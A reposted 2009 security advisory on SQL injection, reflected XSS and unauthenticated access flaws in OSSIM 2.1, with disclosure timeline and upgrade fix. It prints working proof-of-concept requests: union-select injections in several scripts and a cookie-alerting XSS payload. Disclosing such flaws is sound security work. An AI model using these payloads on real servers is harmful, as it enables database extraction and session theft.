OSSIM 2.1 - Multiple security vulnerabilities-白红宇

OSSIM 2.1 - Multiple security vulnerabilities

阅读量：2432 次

发布时间：2019-05-10

本文共 3395 字，大约阅读时间需要 11 分钟。

OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.

1. SQL Injections

2. Linked XSS

3. Unauthorized access

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055

Application: OSSIM

Versions Affected: 2.1 and may be 2.1.1

Vendor URL: http://ossim.net/

Bug: SQL Injection,XSS, Unauthorized access

Exploits: YES

Reported: 07.09.2009

Vendor response: 09.09.2009

Solution: YES (version 2.1.2)

Date of Public Advisory:21.09.2009

Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details

*******

1.1 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_document.php

Vulnerable parameter - id_document

Example

*******

http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3

union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

1.2 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_links.php

Vulnerable parameter - id_document

Example

*******

http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3

union select 1,user(),3,4,5,6

1.3 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_editdocument.php

Vulnerable parameter - id_document

Example

*******

http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3

union select 1,user(),3,4,5,6

1.4 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - getpolicy.php

Vulnerable parameter - group

Example

*******

http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1

1.5 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - newhostgroupform.php

Vulnerable parameter - name

Example

*******

http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select

user(),'b','c','d','f

1.6 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - modifynetform.php

Vulnerable parameter - name

Example

*******

http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select

user(),'b','c','d','e','f','g','h','a

And others scripts in policy menu.

2. Linked XSS in main menu

Vulnerable script /ossim/

Vulnerable parameter - option

Example

*******

http://OSSIM-SERVER/ossim/?option=0" οnlοad=alert(document.cookie) a="

3. Access to data without authentication.

Unauthorized user can see graphs and infrastructure

Example

*******

Access to the graph:

http://OSSIM-SERVER/ossim/graphs/alarms_events.php

Internal infrastructure view:

http://OSSIM-SERVER/ossim/host/draw_tree.php

Fix Information

***************

Upgrade to version 2.1.2

References

**********

http://www.alienvault.com/community.php?section=News

http://dsecrg.com/pages/vul/show.php?id=155

About

*****

Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com

http://www.dsecrg.com

转载地址：http://igmmb.baihongyu.com/

你可能感兴趣的文章